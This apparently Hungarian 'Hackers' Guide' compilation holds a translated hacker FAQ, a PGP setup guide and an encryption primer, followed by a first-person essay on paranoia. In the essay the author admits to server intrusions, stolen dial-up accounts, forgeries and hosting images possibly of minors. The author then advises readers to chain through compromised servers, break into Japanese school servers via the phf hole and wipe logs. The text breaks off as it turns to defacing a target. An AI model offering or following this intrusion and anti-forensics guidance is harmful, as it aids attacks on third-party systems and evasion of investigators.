Ne használj ostoba, nagyzoló felhasználói azonosítót vagy becenevet.
•
Ne keveredj felesleges vitákba (flame háborúkba) a Usenet-en (máshol sem).
•
Ne hívd magad `cyberpunk'-nak és vesztegesd az idődet olyanra, aki annak titulálja magát.
•
Ne küldjél e-mail-eket tele helyesírási és nyelvtani hibákkal.
63
Hackers’ Guide
Ha ilyeneket csinálsz, legfeljebb rossz híred kel -- csak azt jegyzik meg rólad, mekkora balfácán vagy. A hackereknek jó a memóriájuk -- évekbe telhet amíg elfelejtik a kezdő botladozásaidat, és befogadnak. A becenevek problémájára külön visszatérnék. Az igazi személyed becenevek mögé rejtése gyerekes és ostoba dolog, és a crackerekre, warez d00dz-okra és más alsóbbrendű életformákra jellemző viselkedés. A hacker nem csinál ilyet; büszke arra amit csinál és amit elért, ezért szereti, ha az igazi nevét is ismerik. Tehát ha ilyen becenevet használsz, hagyd el, mert a hackerek között csak vesztesnek bélyegez. Egyéb források Peter Seebach karbantart egy kiváló Hacker GyIK-et menedzserek, főnökök számára, akik nem tudják hogyan álljanak a hacker beosztottakhoz. Ha Peter lapja nem lenne elérhető, próbáld az Excite-on keresztül megtalálni a lap egy másolatát. A Loginatakának van némi mondanivalója a Unix hacker képzettségét és hozzáállását illetően. Írtam egy esszét A hackerség rövid története címmel. Írtam egy esszét, A Katedrális és a Bazár címmel, ami részletesem elemzi a Linux és az open-source köré épülő társadalmak működését. Még közvetlenebbül tárgyaltam ezt a témát a folytatásban a Homesteading the Noosphere-ben. Gyakran Ismételt Kérdések K: Megtanítasz hackelni? V: Amióta először megjelentettem ezt a lapot, hetente (gyakran naponta) többen kérik, hogy "tanítsak meg mindent a hackelésről". Sajnos, erre sem időm, sem energiám nincs; a saját hackeléssel kapcsolatos projektjeim kiteszik az időm 110%át. Még ha lenne is lehetőségem arra, hogy a hackelést tanítsam, nem tehetném, mert ez egy olyan hozzáállás és képesség, amit magadnak kell egyedül elsajátítanod. Meg fogod látni, hogy az igazi hackerek örömmel segítenek neked, de nem fognak tisztelni és elismerni, ha mindent a szádba kell rágjanak. Tanulj meg először néhány dolgot. Mutasd meg, hogy próbálkozol, hogy tudsz önállóan tanulni. Ezek után a hackereket már csak specifikus kérdésekkel zargasd. K: Akkor hol kezdjem? V: Valószínűleg a legjobb módja a hackeléssel való ismerkedésnek az, ha elmész egy Linux Felhasználói Csoport gyűlésére. Megtalálhatod ezeknek a csoportoknak a listáját az LDP General Linux Information Page weblapon; valószínűleg van egy a közeledben, esetleg egy főiskolán vagy egyetemen. A Linux Felhasználói Csoport tagjaitól egyszerűen szerezhetsz Linuxot és egészen biztosan segítenek majd a telepítésnél is. K: Mikor kell kezdenem? Nem vagyok én már ehhez túl öreg? V: Legyél bármilyen idős, a motiváció a fontos. Általában a 15 és 20 év közötti korosztály érdeklődését kelti fel a hackelés, de ismerek kivételeket mind a két irányban. K: Mennyi ideig tart, amíg megtanulok hackelni?
64
Hackers’ Guide
V: Ez attól függ, hogy mennyire vagy tehetséges és mennyire dolgozol keményen. Általában 18 hónap vagy 2 év alatt már tiszteletreméltó képességekre tehetsz szert, ha ügyes vagy. Ennek ellenére ne gondold, hogy ennyi az egész; ha igazi hackerré válsz, sohasem hagyod abba a tanulást, életed hátralevő részét a képességeid tökéletesítésével töltöd majd. K: Segítenél feltörni egy rendszert, vagy megtanítanál betörni? V: Nem. Az aki ennek a GyIK-nek az elolvasása után ilyen kérdést tesz fel, túl ostoba ahhoz, hogy bármit tanítsak neki, még ha időm lenne is. Bármilyen ilyen témában küldött e-mail a szemetes kosárban köt ki, vagy rosszabb esetben a feladó durva válaszra számíthat. K: Betörtek hozzám. Segítesz elkerülni a jövőbeni támadásokat? V: Nem. Ezt a kérdést mindig olyanok teszik fel, akik Windows-t használnak. A Windows-os rendszereket nem lehet hatékonyan biztonságossá, a betörésekkel szemben ellenállóvá tenni; a kódban és a szoftver architektúrájában túl sok lyuk van, körülbelül olyan vállalkozás ez, mintha pohárral akarnánk egy süllyedő hajóból a vizet kimerni. Az egyetlen megbízható megoldás, ha átváltasz Linuxra vagy valamilyen másik igazi biztonságos operációs rendszerre. K: Hol találkozhatok, beszélhetek igazi hackerekkel? V: A legjobb megoldás, ha keresel egy Linux vagy Unix Felhasználói csoportot és elmész a gyűléseikre (találsz linkeket az LDP weblapján a Metalabnál). (Régebben azt írtam volna itt, hogy IRC-n nem találkozhatsz igazi hackerrel, de úgy tűnik ez változik. Mostanában igazi hacker csoportoknak, mint pl. a GIMP és a Perl körül serénykedőknek, saját IRC csatornájuk van.) K: Tudsz ajánlani hasznos könyveket a hackeléssel kapcsolatban? V: Én tartom karban a Linuxos Irodalomlista HOGYANt , ez segítségedre lehet. A Loginataka szintén érdekes lehet. K: Mit kell először megtanuljak? V: A HTML-t, ha még nem ismernéd. Sok csillogó-villogó, lényegtelen dolgokra fókuszáló rossz HTML-ről szóló könyv van forgalomban, és kétségbeejtően kevés jó. Személyes kedvencem az HTML: The Definitive Guide című O'Reilly kiadvány. A HTML azonban nem programozási nyelv. Ha felkészültél arra, hogy elkezdjél programozni tanulni, véleményem szerint a Pythont válaszd. Sokan a Perlt ajánlják, ami igaz, hogy elterjedtebb, mint a Python, de nehezebb megtanulni és (véleményem szerint) nincs olyan jól megtervezve. Találhatsz linkgyűjteményt a kezdő Python programozó számára a Weben. A C igazán fontos, de ugyanakkor sokkal nehezebb, mint a Python vagy a Perl. Ne próbáld elsőként megtanulni. Windows felhasználók, ne ragadjatok le a Visual Basic-nél! Rossz programozási szokásokat fogtok felvenni tőle, és nem hordozható, teljesen a Windows platformra van utalva. Kerülendő. K: Muszáj utálnom a Microsoftot? V: Nem, nem muszáj. Nem azért, mert nem érdemli meg, de léteztek hacker közösségek a Microsoft előtt, és lesznek még akkor is, amikor a Microsoft már régen
65
Hackers’ Guide
történelem lesz. A Microsoft utálata helyett szeresd inkább a saját erődet. Írjál jó kódot, ezzel többet érsz el, mint a Microsoft mocskolásával, és még a hírnevedet sem sodrod veszélybe. K: De nem veszélyezteti az open-source szoftverfejlesztés a programozók megélhetését? V: Ez valószínűtlen -- sőt, a nyílt forráskódú szoftveripar inkább új állásokat hoz létre. Ha az, hogy egy program meg van írva, nettó nyereséggel jár, a programozót meg fogják fizetni, függetlenül attól, hogy a program nyílt lesz-e, miután elkészül. Az is mindegy, hogy mennyi "nyílt" szoftvert írnak a programozók, úgy tűnik, hogy növekvő kereslet van az új és testre szabott alkalmazások iránt. Többet írtam erről a témáról az Open Source lapokon. K: Hogyan fogjak neki? Honnan szerezzek szabad Unixot? V: Feljebb ezen az oldalon találsz mutatókat a legelterjedtebb szabad Unixokra. Ahhoz, hogy hacker legyen belőled, motivációra, vállalkozó szellemre és az önálló tanulás képességére van szükséged. Vágj bele most... Eric S. Raymond mailto:
[email protected] Fordította: Kovács Emese mailto:
[email protected]
************************************************************************************************
Használjatok PGP-t Ebben a cikkben leírom, hogy Windows98/NT/2000 alatt hogyan tudjátok használatba venni a PGP-t és egyszeruen biztonságossá tenni a levelezéseteket! A titkosítás cikkben már írtam arról, hogy mi a digitális aláírás értelme, most erre nem térek ki, csak azt írom itt le, hogy honnan lehet a szükséges cuccokat letölteni, és mit kell csinálni! A PGP legújabb változatát a http://web.mit.edu/network/pgp.html címrol lehet leszedni. Válasszuk ki a megfelelo verziót (PGP Freeware v6.5.3) és Download. Itt feltesz négy kérdést, amelyekre mindre Yes-el kell válaszolni, aztán már bent is vagyunk a letöltés oldalon. Ez az oldal csak 10 percig él, utána már nem tudunk letölteni, hanem vissza kell menni (nem tudom ez a hülyeség miért kell, de hát ez van). A PGPFreeware 6.5.3 mérete olyan 7.5 mega körül van. Ezt installáljuk fel. Ezután a Start menübe kapunk egy PGP nevu menüpontot, és ebben van egy olyan ikon, hogy PGPtray. Ezt elindítva betelepedik lentre, az óra
66
Hackers’ Guide
mellé, és használatba vehetjük a PGP-t. (Érdemes a PGPtray-t induláskor automatikusan elindíttatni vele.) Indítsuk el a PGPKeys -t, ezzel fogunk egy új kulcspárt generálni magunknak, amivel utána titkosíthatjuk a cuccokat. Van ott egy olyan gomb, hogy Generate keys. Az értelemszeru kérdéseken túl válasszuk a Diffie-Hellman/DSS típusú kulcsot, aztán válasszuk ki a kulcsméretet (megfelelo a default 2048/1024 is). Legyen keypair never expires, aztán írjuk be a választott jelkifejezést (jelszót, ami lehetoleg jó bonyolult legyen) kétszer. Ezután legenerálja a kulcsot a pgp, hagyjuk üresen a Send my key to the root server now ikszelonégyzetet és Finish. A PGPKeys ablakban ezután megjelenik a kulcsod. Kattints rá jobb gombbal és Set as default. Ezek után, ha elindítod az Outlook Expresst, és írsz egy új levelet valakinek, akkor a fölso gomboknál megjelenik három új gomb. Az elso az Encrypt, ezzel tudjuk titkosítani a címzettnek a levelet (ha a címzett kulcsa megvan a keyringen). A másodikkal tudjuk digitálisan aláírni a levelünket. (Be kell nyomni a gombot, és az aláírás a levél elküldésénél történik meg.) A harmadik elindítja a PGPKeys-t. Nagyjából ennyi. Ha valakinek van kérdése, írjon mailt.
************************************************************************************************
A titkosításról Fordítás, eredeti cím/szerzo: "PGP Encryption for Beginners."/the saint/ De eloször, kezdjük ezzel: mi a fenének akarnád titkosítani az adataidat? Szóval!! képzeld el, hogy valaki betör a számítógépedbe. Ahelyett, hogy ellophatná az összes hitelkártyaszámodat és jelszavadat, és elolvasná az emailjeidet, helyette csak titkosított hulladékot fog kapni, ami semmit nem jelent neki, és igencsak nehéz lesz visszakódolni. Ha nem egyedül használod a számítógépet. Kockáztatnád, hogy valaki hozzáférjen a privát adataidhoz? Remélem, érted, mirol van szó. A PGP (Pretty Good Privacy) - egy rendszer, amely kombinálja a hagyományos és a nyilvános kulcsú titkosítások elonyeit. (Ezekrol késobb lesz szó majd.) Néha hibrid titkosításnak is nevezik (hybrid cryptosystem). Bevezetés a kriptográfiába Legeloször is megismertetnék veled néhány szót, amelyet gyakran fogok használni ebben a cikkben:
67
Hackers’ Guide
1. Nyílt szöveg (plain text) - adat, amely könnyen olvasható és megértheto, speciális muveletek nélkül. (Például ez a cikk nyílt szöveg, amit most olvasol.) 2. Rejtjelzés (encryption) - A nyílt szöveg megváltoztatásának útja, amely során megváltozik az alakja, de az adatok nem vesznek el, és a célja az, hogy "elrejtse" az adatot a "gonoszok" elol. 3. Rejtjelezett szöveg (ciphertext) - a rejtjelzés végeredménye - elso ránézésre egy szeméthalom. 4. Visszafejtés (decryption) - módszer a rejtjelezett szöveg nyílt szöveggé konvertálására. 5. Titkosítás (cryptography) - az adatok rejtjelzésének / visszafejtésének tudománya. 6. Titkosítás megfejtése (cryptanalysis) - a rejtjelezett adat feltörésének tudománya, különbözo eszközöket és technikákat használ. 7. Támadó (attacker, cryptanalist) - a rejtjelzett adat feltöroje 8. Kriptológia (cryptology) - a titkosítást és a megfejtését is magában foglaló tudomány. 9. Cipher - rejtjelzo algoritmus, a rejtjelzés során használt matematikai függvény. A következo a logikai útja az egész folyamatnak: NYÍLT SZÖVEG --> REJTJELZÉS --> TITKOSÍTOTT SZÖVEG --> VISSZAFEJTÉS -> NYÍLT SZÖVEG A titkosítás egy matematikai tudomány. Matematika használatával rejtjelzi / visszafejti az adatot a tároláshoz, vagy a hálózaton való továbbításhoz (pl. az interneten keresztül). A titkosítás fobb típusai A titkosítás fobb típusai a "gyenge" és az "eros". A titkosítás erossége attól függ, hogy mennyi idore és eroforrásba kerül, hogy visszakapd a nyílt szöveget. A jelen cikk írásának pillanatában a Földön létezo összes számítógép együtt nem volna képes feltörni egy eros kulcsot. De soha nem tudhatod - a holnap hozhat sokkal erosebb számítógépeket, vagy valaki találhat egy matematikai megoldást a visszafejtésre anélkül, hogy tudná a jelszót. Hogyan muködik a titkosítás? A cipher valamilyen kifejezést/szót/számokat (kulcs), és egyéb adatokat használ ahhoz, hogy rejtjelezze a nyílt szöveget. Különbözo kulcsok természetesen más rejtjelezett szöveget adnak végeredményül. A rejtjelezett adat erossége két dologtól függ: a cipher erosségétol és a kulcs erosségétol. Éppen ezért a kulcsot megfeleloen kell megválasztani és tárolni (ha lehet, akkor meg kell jegyezni :) Mindezek a dolgok együttesen adják a titkosítási rendszert (cryptosystem). Hagyományos titkosítás A rejtjelezo algoritmus itt egyetlen kulcsot használ a rejtjelezéshez és a visszafejtéshez. Erre egy példa a DES (Data Encryption Standard), amelyet széles körben használnak a Szövetségi Kormányzásban (USA - Federal Government). A hagyományos titkosításnak elonyei és hátrányai is vannak. Eloször is - nagyon gyors, és olyan adatok rejtjelezésére kiváló, amelyet senki más nem fog használni a tulajdonosán kívül. Emiatt - a kulcs biztonságos átadása nagyon nehéz manapság: mielott más is el tudná olvasni az adatot, elotte át kell neki adnod a kulcsot, ami nem 68
Hackers’ Guide
praktikus, mert nem bízhatsz meg a telefontársaságokban, postában, az e-mailben és egyéb internetes szolgáltatásokban. Felmerül a kérdés: hogyan juttatod el a kulcsot a címzetthez, anélkül, hogy más is hozzájuthasson? A válasz erre ma a: Nyilvános kulcsú titkosítás (áttekintés) Ez megoldja a kulcscsere problémáját. Whitefield Diffie és Martin Helman vezette be a nyilvános kulcsú titkosítás módszerét 1975-ben. Pletykák szólnak arról, hogy a Brit Titkosszolgálat is feltalálta néhány évvel azelott, de titokban tartották és nem csináltak vele semmit. A nyilvános kulcsú titkosítás aszimmetrikus rendszer, és két kulcsot használ (kulcspár): egy nyilvános kulcsot (public key), amelyet a rejtjelezésnél használnak, és egy titkos kulcsot (private key), a visszafejtéshez. A nyilvános kulcsot világszerte közzéteszik, de a titkos kulcsot titokban tartják. Bárki és bármi rejtjelezhet a te titkos kulcsoddal, de csak te (vagyis pontosabban az a személy, aki birtokában van a titkos kulcsnak) tudja visszafejteni a rejtjelezett szöveget. Most visszatérünk a PGP-hez A legnépszerubb titkosítási rendszerek egyike a PGP (Pretty Good Privacy). Ahogy fentebb már szó volt róla, a PGP hibrid titkosítási rendszer - tehát kombinálja a hagyományos és a nyilvános kulcsú titkosítást. A PGP a következo módon muködik: A) Rejtjelezés: 1) Eloször a PGP tömöríti a nyílt szöveget. Ez több okból hasznos: kevesebb helyre lesz szükség a lemezen, a kisebb üzenet kevesebb idot jelent (az ido pedig pénz), amikor az interneten keresztül küldöd; továbbá növeli a titkosítás erosségét, mert a tömörített adatban kevesebb minta van, mint a nyílt szövegben, és a mintákat gyakran alkalmazzák a támadók, hogy megtörjék a rejtjelet... (pl. elemzik, hogy melyik betu fordul elo legtöbbször, és feltételezik, hogy az a "t" betu, stb. -Voyager2) 2)a PGP azután generál egy egyszer használatos titkos kulcsot, amelyet néha session-kulcsnak is neveznek. Ez egy véletlenszám, véletlen adatokból eloállítva, amelyek az egered mozgatásából és a billentyuleütésekbol származnak, valamint a CPU zajából. Egy nagyon gyors és eros hagyományos titkosítási algoritmussal elkódolja a nyílt szöveget, és eloállítja a rejtjelezett szöveget. 3) Az adat titkosítása után a session-kulcsot rejtjelezi a címzett nyilvános kulcsával (akinek az üzenetet küldjük), és azután ezt a rejtjelezett session-kulcsot és a rejtjelezett szöveget elküldi a címzettnek. B) Visszafejtés: 1) A címzett ugye megkapta az üzenetet, és a titkos kulcsával visszafejti a sessionkulcsot. 2) A session-kulcsot használva visszafejti a hagyományosan titkosított rejtjelezett szöveget. 3) Megszünteti a tömörítést. A hagyományos és nyilvános kulcsú titkosítás kombinálása nagyon gyors és eros titkosítási rendszert eredményez. Ez a hagyományos titkosítás gyorsasága és a nyilvános kulcs biztonsága miatt van. Néhány szó a kulcsokról...
69
Hackers’ Guide
A kulcs egy szám, amelyet a rejtjelezo algoritmus a rejtjelszöveg eloállításához használ. Ezek valójában óriási számok. A kulcs méretét bitekben jelzik, minél nagyobb a kulcs, annál titkosabb a rejtjelszöveg. A hagyományos és a nyilvános kulcsok méretének összehasonlítása érdekes - a hagyományos 128-bites kulcs ugyanolyan erosségu, mint egy 3000 bites nyilvános kulcs. De nem hasonlíthatod össze ezeket a típusokat, mert más-más algoritmusban használatosak (nem ugyanaz, hogy Bakonyban a tanya, vagy takonyban a banya, igaz-e?) A legmagasabb szintu biztonság eléréséhez mindig a legnagyobb méretu kulcsot válaszd, mert elég idot és eroforrást feltételezve a titkos kulcs megfejtheto. A kulcsokat titkosított formában tárolja a PGP. Általában két "keyring"-et használ (ezek fájlok a lemezen) - az egyiket a nyilvános kulcsoknak, a másikat a titkosnak. Ne veszítsd el a titkos keyringet, mert minden adat, amely ezekhez a kulcsokhoz lett titkosítva, soha többé nem kerülhet visszafejtésre. .. és a digitális aláírásokról Ahogy a kézzel írt aláírások is, a digitális aláírás azonosítja az információ eredetét. Gyakran ez a tulajdonsága a titkosításnak gyakrabban használatos, mint a rejtjelezés. A digitális aláírást "lehetetlen" hamisítani. Röviden - amikor digitális aláírással van dolgod, biztos lehetsz benne, hogy a megfelelo ember írta alá az adatot. A digitális aláírás a következoképpen muködik: 1) A nyílt szöveget titkosítják a TITKOS kulcsoddal. 2) Ha rejtjelezett szöveg visszafejtheto a NYILVÁNOS kulcsoddal, akkor az adat toled származik. Ez az eljárás lassú és nagy mennyiségu adatot állít elo, amely nem szükséges az aláírás ellenorzéséhez. Ezért találták ki a Hash függvényeket. Ezek növelik az aláírás hatékonyságát. A hash függvény egy akármilyen bemeneti szövegbol eloállít egy fix hosszúságú kimeneti szöveget (kivonat - digest). A matematikai oldalról nézve a függvényt, a bemeneti szövegben történo akár csak egy kis apró változás teljesen más kivonatot fog eredményezni. Na és ezt a kivonatot titkosítják a titkos kulcsoddal (ez az aláírás), és elküldik a nyílt szöveggel együtt a feladónak. A hash függvény biztosítja, hogy senki nem hamisíthatja sem a szöveget, sem az aláírást, mert ebben az esetben az aláírás megbukik az ellenorzésnél. A digitális aláírás a fo útja annak, hogy egy nyilvános kulcs érvényességét leellenorizzük. Digitális tanúsítványok (Digital certificates) Természetesen amikor a nyilvános kulcsú titkosítást használod, akkor biztos akarsz lenni abban, hogy a megfelelo ember kulcsával rejtjelezel. Itt jön a bizonyosság problémája. Tegyük fel, hogy valaki egy hamis kulcsot küld neked egy másik ember nevében, akinek írni akarsz. Amikor rejtjelezed az adatot és elküldöd a "címzettnek", az adat a rossz embernek fog menni. A nyilvános kulcsú környezetben nagyon fontos, hogy tudd, hogy a megfelelo nyilvános kulcsot használod a megfelelo címzetthez. Ennek egyik útja, hogy csak azokhoz a kulcsokhoz rejtjelezel, amelyeket személyesen adtak neked (pl. floppy lemezen). De ez kényelmetlen - eloször is elofordul, hogy nem is ismered a címzettet, másodszor hogyan küldesz adatot
70
Hackers’ Guide
olyasvalakinek, aki éppen nem elérheto fizikailag (egy repülogépen ül, vagy akármi) postagalambot küldesz egy üzenettel? A digitális tanúsítvány egyszerusíti ezt a folyamatot azáltal, hogy megkeresi a megfelelo kulcsot. A tanúsítvány olyan adat, amely hasonló módon értelmezheto, mint a hagyományos tanúsítványok. Ez az információt a nyilvános kulccsal együtt segítséget nyújt a kulcs érvényességének leellenorzésében. A tanúsítvány megakadályozza, hogy valaki kicserélje más nyilvános kulcsát valami más kulcsra. A digitális tanúsítvány a következokbol áll: 1) A nyilvános kulcs 2) tanúsítvány-információ (némi info a felhasználóról, név, ID, stb) 3) legalább egy digitális aláírás (egy harmadik fél által, akiben megbízol). A digitális aláírás egy tanúsítványon azt jelzi, hogy a harmadik fél elfogadta a tanúsítvány-információt. A digitális aláírás nem jelenti a teljes tanúsítvány érvényességét; csupán azt jelzi, hogy az aláírt információ az adott nyilvános kulccsal összetartozik. Röviden - a tanúsítvány egy nyilvános kulcs néhány személyes információval digitálisan aláírva, és egy harmadik fél által hitelesítve. A legnagyobb elony, amelyet a digitális tanúsítvány használatával nyersz, hogy mikor kicseréled a nyilvános kulcsodat valaki mással, nem kell fizikailag jelen lenned. A fizikai kulcscserének vannak elonyei, de csak egy bizonyos pontig. Vannak rendszerek, amelyek sok tanúsítványt tárolnak összegyujtve, hogy bárki ellenorizhesse egy adott kulcs érvényességét. Ezeket hívják tanúsítványszervernek (Certificate Servers/Systems). Egy tanúsítványszerver nem más, mint egy adatbázis, amely lehetové teszi felhasználóknak, hogy tanúsítványokat hozzanak létre és töltsenek le. Tanúsítvány-formátumok Egy digitális tanúsítvány sokféle személyes információt tárol a felhasználóról, a nyilvános kulccsal együtt, és valaki által aláírva, akiben megbízol. A PGP-re visszatérve, két tanúsítvány-formátumot támogat: 1) PGP tanúsítványok 2) X.509 tanúsítványok. Egy PGP tanúsítvány az alábbi dolgokból áll: 1) A PGP verziószáma, amellyel az adott kulcs készült. 2) A tanúsító nyilvános kulcsa a kulcshoz tartozó algoritmussal együtt, amely RSA, DH és DSA lehet. 3) A tanúsítvány érvényességi ideje, ez jelzi, hogy meddig érvényes az egész. 4) A kulcshoz tartozó hagyományos titkosító algoritmus neve. Ez mutatja, hogy a tanúsítvány tulajdonosa milyen módon preferálja a neki küldött adatok titkosítását. Ezek lehetnek: CAST, IDEA vagy Triple-DES (3DES néven is emlegetik). Érvényesség és bizalom Az érvényesség bizalom valamiben, hogy az tényleg a tulajdonosához tartozik. Például a nyilvános kulcs, vagy a tanúsítvány. A bizalom nagyon fontos a nyilvános kulcsú rendszerekben, ahol tudnod kell, hogy egy tanúsítvány érvényes-e vagy nem.
71
Hackers’ Guide
Amikor biztos vagy benne, hogy egy tanúsítvány a megfelelo személyhez tartozik, akkor megjelölheted a kulcsát a keyringeden, ezzel jelzed magadnak, hogy ellenorizted a tanúsítványt és érvényes. Ha elküldöd az aláírást egy tanúsítványszervernek, akkor mások tudni fogják, hogy te tanúsítottad az érvényességét. Ahhoz, hogy higgy valakinek, aki tanúsította valamely tanúsítvány érvényességét - bíznod kell benne. Az érvényességet úgy is leellenorizheted, hogy találkozol a címzettel és fizikailag átveszed tole a kulcsot. A másik módja ennek az "ujjlenyomatok" (fingerprints) használata. Egy PGP ujjlenyomat egy tanúsítványból keletkezik egy hash függvény segítségével. Minden ujjlenyomat egyedi. Általában hexadecimális formában, vagy néhány szó formájában jelenik meg. Amikor van ujjlenyomatod az adott tanúsítványról, és ismered a címzett hangját, felhívhatod, hogy olvassa fel az övét ha egyeznek, akkor o a kulcs birtokosa. De sokszor nem ismered a hangját - ekkor egy harmadik félhez kell fordulnod (egy tanúsítvány-szerverhez). De ne feledd, hogy - hacsak a kulcs tulajdonosa nem adta át neked fizikailag - egy harmadik félben kell bíznod. Jelszavak és jelkifejezések (passphrases) Majdnem minden nap, amikor számítógépeket használsz, be kell írnod egy titkos karakterkombinációt, egy jelszót, hogy hozzáférhess valamilyen információhoz. Ezek tehát ismerosek. Ha nem - hoppá, akkor rossz cikket olvasol :) Egy jelkifejezés a jelszónak egy hosszabb formája, sokkal biztonságosabb ilyet használni. A jelkifejezés segít, hogy nagyobb biztonságban legyen az adat olyan támadásokkal szemben, amelyek szótári szavakat használnak. A legjobb jelkifejezések hosszúak és bonyolultak, és mindenféle karaktert tartalmaznak. A PGP jelkifejezést használ a titkos kulcsod rejtjelezésére a titkos keyringen. Ezt a jelkifejezés-bol vett hash segítségével teszi. A titkos kulcsod használatához ismerned kell a jelkifejezést. A jelkifejezésnek olyannak kell lennie, hogy ne felejtsd el, de mások nehezen találhassák ki. Valami olyasmit válassz, amely a hosszú-távú memóriádban már berögzült, inkább ne találj ki valami teljesen új dolgot. Ha elfelejted a jelkifejezést, a titkos kulcsod teljesen használhatatlanná válik és az ehhez tartozó nyilvános kulccsal rejtjelezett adatokat sem tudod majd visszafejteni.
************************************************************************************************
A paranoiáról Pár napja még nem gondoltam volna, hogy azt fogom írni, amit itt most írni készülök. És aztán egyik napról a másikra BUMM, bejöttek a dolgok, szépen sorra, és most meg a laza naív gyerekből paranoiddá váltam. Igaz, már egy ideje feladtam a hackelést a nagyvilágban, csak akkor ugrok neki valaminek, ha a saját
72
Hackers’ Guide
szempontomból fontos, de mégis, tudtára kell adnom minden hozzám hasonló gondolkodásúnak, hogy változtak a dolgok. Mielőtt még elálmosodnál, elmondom, hogy nem csak pofázni fogok oldalakon keresztül, adok ötleteket, segédprogramokat. Tudjátok, egy éve egy skót haverom letiltották a szolgáltatójánál, csak mert letöltött egy file-t a netről, ami hackeléssel kapcsolatos. Kiröhögtem, hogy hogy lehet ilyen körülmények között internetezni, hogy minden egyes fingását nézik az embernek. Most kiderült, hogy magyarország sürgős ütemben halad a "nyugati" irányba. Az amerikaiaknál teljes paranoia van, amit én régen nem érthettem meg, de egyre jobban kezdem komolyan venni. Néhány hír a közelmúltból... A napok eseményei Ez egy kisebb eset: a gyerek velem együtt felnyomott egy japán szervert az iskolájából. Nem is titkolom, az eötvös józsef gimiben történt az eset. Nem sok idő múlva a gyerek ki lett tiltva, mert a japánok írtak a suliba, hogy a suli IP címéről nyomultak be. Elkobozták számítógépét, és kártérítést fizettettek meg egy budapesti fiatallal, aki egy matávnet felhasználó hozzáférését használta az internetezésre. Amikor az előfizető reklamált, a matávnet belenézett egy-két logfile-ba, és kapásból megmondták a telefonszámát, a csalót a rendőrség kézrekerítette. Egy politikust, volt polgármestert letartóztattak. Állítólag illegális (/pedofil?) képeket terjesztett a neten. Akárhogy is volt, az elender kiadta felhasználóját. Nem csak hogy a felhasználónevet nyomozták ki, megmondták a pontos telefonszámot, ahonnan a netet hívták a bizonyos időkben, amikor a képek terjesztése történt. Kinyomozták az OTP nyugta hamisító kilétét. Valaki beszkennelt egy OTP bizonylatot, profin átírta, mintha a nyugta 2000-ben 1990-et írt volna ki dátumként, a képet felrakta a netre, ezzel rossz helyzetbe hozta a bankot, mintha nem készült volna fel megfelelőképpen a dátumváltásra. Megint, a személy kilétét kinyomozták, aki azóta elnézést kért a banktól, állítása szerint "nem mérte fel cselekménye" következményeit. Barátom az elender meghackelést követően kapásból felrakta az extrára "elendersux" azonosítóval a meghackelt elender lapot. Azt, amit mindenkinek joga van látni. A hozzáféréseket úgyis már letiltották. De mégis, fél nap se telt bele, és az extra letörölte, az elender kérésére. Nem le kell törölni más lapját, hanem meg kell védeni a saját rendszert, úgy, hogy nem windows-buzi "szakemberekkel" készítteted el a rendszered. A rendőrség, és úgy általában mindenki véres hadjáratot indított a "hackerek" ellen. Konklúzió Most rájöttem, nem azért nem buktam idáig le semmivel, mert nem tudták lenyomozni, meg nem érdekelte a szolgáltatót. Senki sem jelentett fel. Én is lopott matávnetes accot használok, mint még rajtam kívül legalább ezer ember, nem ismerem a statisztikát. Csináltam már hasonló hamisítványokat, mint az OTP-s ügyben. Az XXX szexképek-részben sem biztos, hogy mindegyik, a képen szereplő lány betöltötte 18. életévét. Fogalmam sincs, mivel nekem is csak küldték őket, én meg a látogatottságért felraktam őket. A hacklife-ban is vannak illegális dolgok bőven. A novell - hackelés sem hiszem, hogy nagyon törvényszerű lenne. Na és a "beszólások" részben, hogy nem cenzoráltam az emberek beszólásait? Meg a vírusok, amelyekhez a lapomon mindenki hozzáférhet? És akkor még nem beszéltem az Anarchista "főzőcskekönyv"-ről, ami a Textek részben van, minden le van benne írva, hogy kell valakit megölni, puskaport készíteni, vagy macskabombát.
73
Hackers’ Guide
Tovább fokozom: MP3. Többet nem is kell mondanom. Ez már teljesen illegális dolog. Megfosztom szegény zeneszerzőket attól, hogy 10-szer jobban éljenek egy átlagembernél, csak 9-szer élnek jobban, mert csomó ember a netről leszedi a számukat. Persze hogyha én nem lennék, akkor mindenki megvenné a K*RVA drága CD-t, de mivel én ide felrakom a számokat MP3-ban, ezért a látogatóim nem veszik meg a szerző termékét, amiből úgyse az énekes, hanem a kiadó gazdagodik meg. És most meg töröljek le mindent? Akkor végre nem éheznének az énekesek? Na jólvan! Mégis, tudom, hogy egyszercsak egy extrásnak, vagy egy matávnetesnek, vagy egy fakabátnak fel fog tűnni a lapom, vagy hogy nem csak a saját hozzáférésem használom, és akkor vagy lebukok kicsit, vagy lebukom nagyon... jönnek hozzám is elkobozni mindent. Aztán max. 1 leszek a sok hír közül. És ugyanez most már megtörténhet bárkivel. Ha hekkerkedésre adod a fejed akkor számíts arra, hogy bármikor egy papírkosárba hullhat. Most ennek az elkerülésére nyújtanék egy-két ötletet, illetve programot. Útvonal Bárhova telnetelsz, webelsz, bármi rád nézve terhelőt csinálsz, használj néhány közbeiktatott szervert. Azt, hogy részletesen hogy kell ezt csinálni, itt nem tudom leírni, az hosszú, és részletes. Kiindulásnak ajánlom pl. a webprovider-t, egy független ingyenes szolgáltatót, ahol saját domaint kapsz, és telnet lehetőséged is van. De persze ez magában nem elég, kell keresni a hálón kisebb japán szervereket, pl. iskolai szervereket, ezekbe nagyon könnyű bejutni, már milliószor csináltam, nem kell hozzá extra ész, 10%-on működik legalább a phf-lyuk, akármikor kinyomtathatsz egy japán suliban egy levelet az ottani nyomtatóra :) De mégjobb ha mondjuk van ismerettséged egy suliban, és ott helyileg behackelődsz, így telnetet meg egyebeket teremtve magadnak. Ez nem is nehéz dolog. Aztán ha már van 1-2 védelmed, akkor ha épp betelnetelni készülsz a célponthoz, menj keresztül ezeken a szervereken egy-párszor, és amikor csak lehet, tűntesd el a logfile-okból magad, ha van rá lehetőséged. Tudom, hogy ez kibaszottul kurvára sok munka, de ha valami tényleg nagyra készülsz, akkor nem lenne jó lebukni, nem? Vagy ha ezek a módszerek nem mennek még nagyon, akkor az is jó, ha az alapvető lebukási lehetőséget kiiktatod, mert csak úgy juthatnak el hozzád, ha a saját net hozzáférésed használod, vagy a saját telefonszámod. Tulajdonképpen ha mindkettőt ki tudod iktatni, akkor már nem is kell varázsolnod logfileokkal meg egyebekkel. Végső akció kivitelezés Folytassuk csak onnan, ahol abbahagytuk! Tehát valami nagyra készülsz... már tudod, hogy mit hogy, satöbbi.... tegyük fel, hogy már meg is szereztél egy jelszót, és fel akarsz tölteni egy új lapot a célpontra. Nézzük csak, milyen célpontjaid 